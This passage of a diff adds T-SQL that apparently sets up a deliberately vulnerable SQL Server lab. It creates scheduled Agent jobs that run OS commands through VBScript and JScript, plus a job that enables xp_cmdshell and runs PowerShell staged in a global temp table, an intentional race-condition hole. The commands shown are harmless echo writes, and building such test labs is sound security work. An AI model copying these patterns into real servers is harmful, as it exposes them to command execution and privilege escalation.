QuitWithRollback +EXEC @ReturnCode = msdb.dbo.sp_add_jobschedule @job_id=@jobId, @name=N'PowershellDaily', + @enabled=1, + @freq_type=4, + @freq_interval=1, + @freq_subday_type=1, + @freq_subday_interval=0, + @freq_relative_interval=0, + @freq_recurrence_factor=0, + @active_start_date=20240509, + @active_end_date=99991231, + @active_start_time=0, + @active_end_time=235959, + @schedule_uid=N'5040c673-1700-4296-a892-71e7140e1054' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +EXEC @ReturnCode = msdb.dbo.sp_add_jobserver @job_id = @jobId, @server_name = N'(local)' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +COMMIT TRANSACTION +GOTO EndSave +QuitWithRollback: + IF (@@TRANCOUNT > 0) ROLLBACK TRANSACTION +EndSave: + +GO + +---------------------------------------------------------------------- +-- Create agent jobs that execute OS commands - ActiveX VBScript +---------------------------------------------------------------------- + +USE [msdb] +GO + +/****** Object: Job [OS COMMAND EXECUTION EXAMPLE - ActiveX: VBSCRIPT] Script Date: 5/9/2024 9:06:00 AM ******/ +BEGIN TRANSACTION +DECLARE @ReturnCode INT +SELECT @ReturnCode = 0 +/****** Object: JobCategory [[Uncategorized (Local)]] Script Date: 5/9/2024 9:06:00 AM ******/ +IF NOT EXISTS (SELECT name FROM msdb.dbo.syscategories WHERE name=N'[Uncategorized (Local)]' AND category_class=1) +BEGIN +EXEC @ReturnCode = msdb.dbo.sp_add_category @class=N'JOB', @type=N'LOCAL', @name=N'[Uncategorized (Local)]' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback + +END + +DECLARE @jobId BINARY(16) +EXEC @ReturnCode = msdb.dbo.sp_add_job @job_name=N'OS COMMAND EXECUTION EXAMPLE - ActiveX: VBSCRIPT1', + @enabled=1, + @notify_level_eventlog=0, + @notify_level_email=0, + @notify_level_netsend=0, + @notify_level_page=0, + @delete_level=0, + @description=N'No description available.', + @category_name=N'[Uncategorized (Local)]', + @owner_login_name=N'MSSQLSRV04\Administrator', @job_id = @jobId OUTPUT +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +/****** Object: Step [RUN ActiveX: VBSCRIPT] Script Date: 5/9/2024 9:06:00 AM ******/ +EXEC @ReturnCode = msdb.dbo.sp_add_jobstep @job_id=@jobId, @step_name=N'RUN ActiveX: VBSCRIPT', + @step_id=1, + @cmdexec_success_code=0, + @on_success_action=1, + @on_success_step_id=0, + @on_fail_action=2, + @on_fail_step_id=0, + @retry_attempts=0, + @retry_interval=0, + @os_run_priority=0, @subsystem=N'ActiveScripting', + @command=N'FUNCTION Main() + +dim shell +set shell= CreateObject ("WScript.Shell") +shell.run("c:\windows\system32\cmd.exe /c echo hello > c:\windows\temp\artifact-vbscript.txt") +set shell = nothing + +END FUNCTION', + @database_name=N'VBScript', + @flags=0 +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +EXEC @ReturnCode = msdb.dbo.sp_update_job @job_id = @jobId, @start_step_id = 1 +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +EXEC @ReturnCode = msdb.dbo.sp_add_jobschedule @job_id=@jobId, @name=N'VBDaily', + @enabled=1, + @freq_type=4, + @freq_interval=1, + @freq_subday_type=1, + @freq_subday_interval=0, + @freq_relative_interval=0, + @freq_recurrence_factor=0, + @active_start_date=20240509, + @active_end_date=99991231, + @active_start_time=0, + @active_end_time=235959, + @schedule_uid=N'1572a7dc-cafb-4a4b-b92e-ed4715f154b0' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +EXEC @ReturnCode = msdb.dbo.sp_add_jobserver @job_id = @jobId, @server_name = N'(local)' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +COMMIT TRANSACTION +GOTO EndSave +QuitWithRollback: + IF (@@TRANCOUNT > 0) ROLLBACK TRANSACTION +EndSave: + +GO + +---------------------------------------------------------------------- +-- Create agent jobs that execute OS commands - ActiveX JScript +---------------------------------------------------------------------- + +USE [msdb] +GO + +/****** Object: Job [OS COMMAND EXECUTION EXAMPLE - ActiveX: JSCRIPT] Script Date: 8/29/2017 11:17:16 AM ******/ +BEGIN TRANSACTION +DECLARE @ReturnCode INT +SELECT @ReturnCode = 0 +/****** Object: JobCategory [[Uncategorized (Local)]] Script Date: 8/29/2017 11:17:16 AM ******/ +IF NOT EXISTS (SELECT name FROM msdb.dbo.syscategories WHERE name=N'[Uncategorized (Local)]' AND category_class=1) +BEGIN +EXEC @ReturnCode = msdb.dbo.sp_add_category @class=N'JOB', @type=N'LOCAL', @name=N'[Uncategorized (Local)]' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback + +END + +DECLARE @jobId BINARY(16) +DECLARE @user varchar(8000) +SET @user = SYSTEM_USER +EXEC @ReturnCode = msdb.dbo.sp_add_job @job_name=N'OS COMMAND EXECUTION EXAMPLE - ActiveX: JSCRIPT', + @enabled=1, + @notify_level_eventlog=0, + @notify_level_email=0, + @notify_level_netsend=0, + @notify_level_page=0, + @delete_level=1, + @description=N'No description available.', + @category_name=N'[Uncategorized (Local)]', + @owner_login_name=@user, @job_id = @jobId OUTPUT +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +/****** Object: Step [RUN COMMAND - ActiveX: JSCRIPT] Script Date: 8/29/2017 11:17:16 AM ******/ +EXEC @ReturnCode = msdb.dbo.sp_add_jobstep @job_id=@jobId, @step_name=N'RUN COMMAND - ActiveX: JSCRIPT', + @step_id=1, + @cmdexec_success_code=0, + @on_success_action=1, + @on_success_step_id=0, + @on_fail_action=2, + @on_fail_step_id=0, + @retry_attempts=0, + @retry_interval=0, + @os_run_priority=0, @subsystem=N'ActiveScripting', + @command=N'function RunCmd() +{ + var objShell = new ActiveXObject("shell.application"); + objShell.ShellExecute("cmd.exe", "/c echo hello > c:\\windows\\temp\\artifact-jscript.txt", "", "open", 0); + } + +RunCmd(); +', +/** alternative option + @command=N'function RunCmd() + { + var WshShell = new ActiveXObject("WScript.Shell"); + var oExec = WshShell.Exec("c:\\windows\\system32\\cmd.exe /c echo hello > c:\\windows\\temp\\blah.txt"); + oExec = null; + WshShell = null; + } + + RunCmd(); + ', + +**/ + @database_name=N'JavaScript', + @flags=0 + --,@proxy_name=N'WinUser1' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +EXEC @ReturnCode = msdb.dbo.sp_update_job @job_id = @jobId, @start_step_id = 1 +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +EXEC @ReturnCode = msdb.dbo.sp_add_jobserver @job_id = @jobId, @server_name = N'(local)' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +COMMIT TRANSACTION +GOTO EndSave +QuitWithRollback: + IF (@@TRANCOUNT > 0) ROLLBACK TRANSACTION +EndSave: + +GO + + +use msdb +EXEC dbo.sp_start_job N'OS COMMAND EXECUTION EXAMPLE - ActiveX: JSCRIPT' ; + +---------------------------------------------------------------------- +-- Create Global Temp Tables +---------------------------------------------------------------------- + +-- Create global temporary table +IF (OBJECT_ID('tempdb..##GlobalTempTbl') IS NULL) +CREATE TABLE ##GlobalTempTbl (Spy_id INT NOT NULL, SpyName text NOT NULL, RealName text NULL); +GO + +-- Insert records global temporary table +INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (1,'Black Widow','Scarlett Johansson') +INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (2,'Ethan Hunt','Tom Cruise') +INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (3,'Evelyn Salt','Angelina Jolie') +INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (4,'James Bond','Sean Connery') +GO + +------------------------------------------------------------ +-- Create agent job that uses vulnerable global temp tables +------------------------------------------------------------ + +USE [msdb] +GO + +/****** Object: Job [Temp Table Race Condition] Script Date: 5/9/2024 9:34:10 AM ******/ +BEGIN TRANSACTION +DECLARE @ReturnCode INT +SELECT @ReturnCode = 0 +/****** Object: JobCategory [[Uncategorized (Local)]] Script Date: 5/9/2024 9:34:10 AM ******/ +IF NOT EXISTS (SELECT name FROM msdb.dbo.syscategories WHERE name=N'[Uncategorized (Local)]' AND category_class=1) +BEGIN +EXEC @ReturnCode = msdb.dbo.sp_add_category @class=N'JOB', @type=N'LOCAL', @name=N'[Uncategorized (Local)]' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback + +END + +DECLARE @jobId BINARY(16) +EXEC @ReturnCode = msdb.dbo.sp_add_job @job_name=N'Temp Table Race Condition', + @enabled=1, + @notify_level_eventlog=0, + @notify_level_email=0, + @notify_level_netsend=0, + @notify_level_page=0, + @delete_level=0, + @description=N'No description available.', + @category_name=N'[Uncategorized (Local)]', + @owner_login_name=N'MSSQLSRV04\Administrator', @job_id = @jobId OUTPUT +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +/****** Object: Step [run tsql] Script Date: 5/9/2024 9:34:10 AM ******/ +EXEC @ReturnCode = msdb.dbo.sp_add_jobstep @job_id=@jobId, @step_name=N'run tsql', + @step_id=1, + @cmdexec_success_code=0, + @on_success_action=1, + @on_success_step_id=0, + @on_fail_action=2, + @on_fail_step_id=0, + @retry_attempts=0, + @retry_interval=0, + @os_run_priority=0, @subsystem=N'TSQL', + @command=N'--------------------------------------- +-- Script: writefile_bcpxpcmdshell.sql +-- Author/Modifications: Scott Sutherland +-- Based on https://www.simple-talk.com/sql/t-sql-programming/the-tsql-of-text-files/ +-- Description: +-- Write PowerShell code to disk and run it using bcp and xp_cmdshell. +--------------------------------------- + +-- Enable xp_cmdshell +sp_configure ''show advanced options'',1 +RECONFIGURE +GO + +sp_configure ''xp_cmdshell'',1 +RECONFIGURE +GO + +-- Create variables +DECLARE @MyPowerShellCode NVARCHAR(MAX) +DECLARE @PsFileName NVARCHAR(4000) +DECLARE @TargetDirectory NVARCHAR(4000) +DECLARE @PsFilePath NVARCHAR(4000) +DECLARE @MyGlobalTempTable NVARCHAR(4000) +DECLARE @Command NVARCHAR(4000) + +-- Set filename for PowerShell script +Set @PsFileName = ''MyPowerShellScript.ps1'' + +-- Set target directory for PowerShell script to be written to +SELECT @TargetDirectory = REPLACE(CAST((SELECT SERVERPROPERTY(''ErrorLogFileName'')) as VARCHAR(MAX)),''ERRORLOG'','''') + +-- Create full output path for creating the PowerShell script +SELECT @PsFilePath = @TargetDirectory + @PsFileName +SELECT @PsFilePath as PsFilePath + +-- Define the PowerShell code +SET @MyPowerShellCode = ''Write-Output "hello world" | Out-File "'' + @TargetDirectory + ''intendedoutput.txt"'' +SELECT @MyPowerShellCode as PsScriptCode + +-- Create a global temp table with a unique name using dynamic SQL +SELECT @MyGlobalTempTable = ''##temp'' + CONVERT(VARCHAR(12), CONVERT(INT, RAND() * 1000000)) + +-- Create a command to insert the PowerShell code stored in the @MyPowerShellCode variable, into the global temp table +SELECT @Command = '' + CREATE TABLE ['' + @MyGlobalTempTable + ''](MyID int identity(1,1), PsCode varchar(MAX)) + INSERT INTO ['' + @MyGlobalTempTable + ''](PsCode) + SELECT @MyPowerShellCode'' + +-- Execute that command +EXECUTE sp_ExecuteSQL @command, N''@MyPowerShellCode varchar(MAX)'', @MyPowerShellCode + +-- Execute bcp via xp_cmdshell (as the service account) to save the contents of the temp table to MyPowerShellScript.ps1 +SELECT @Command = ''bcp "SELECT PsCode from ['' + @MyGlobalTempTable + '']'' + ''" queryout "''+ @PsFilePath + ''" -c -T -S '' + @@SERVERNAME + +-- Write the file +EXECUTE MASTER..xp_cmdshell @command, NO_OUTPUT + +-- Drop the global temp table +EXECUTE ( ''Drop table '' + @MyGlobalTempTable ) + +-- Run the PowerShell script +DECLARE @runcmdps nvarchar(4000) +SET @runcmdps = ''Powershell -C "$x = gc ''''''+ @PsFilePath + '''''';iex($X)"'' +EXECUTE MASTER..xp_cmdshell @runcmdps, NO_OUTPUT + +-- Delete the PowerShell script +DECLARE @runcmddel nvarchar(4000) +SET @runcmddel= ''DEL /Q "'' + @PsFilePath +''"'' +-- EXECUTE MASTER..xp_cmdshell @runcmddel, NO_OUTPUT', + @database_name=N'master', + @flags=0 +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +EXEC @ReturnCode = msdb.dbo.sp_update_job @job_id = @jobId, @start_step_id = 1 +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +EXEC @ReturnCode = msdb.dbo.sp_add_jobschedule @job_id=@jobId, @name=N'RunDaily-TSQL', + @enabled=1, + @freq_type=4, + @freq_interval=1, + @freq_subday_type=4, + @freq_subday_interval=1, + @freq_relative_interval=0, + @freq_recurrence_factor=0, + @active_start_date=20240509, + @active_end_date=99991231, + @active_start_time=0, + @active_end_time=235959, + @schedule_uid=N'c06927ff-3307-4ca2-b17e-826e3c4942aa' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +EXEC @ReturnCode = msdb.dbo.sp_add_jobserver @job_id = @jobId, @server_name = N'(local)' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +COMMIT TRANSACTION +GOTO EndSave +QuitWithRollback: + IF (@@TRANCOUNT > 0) ROLLBACK TRANSACTION +EndSave: + +GO + + + + +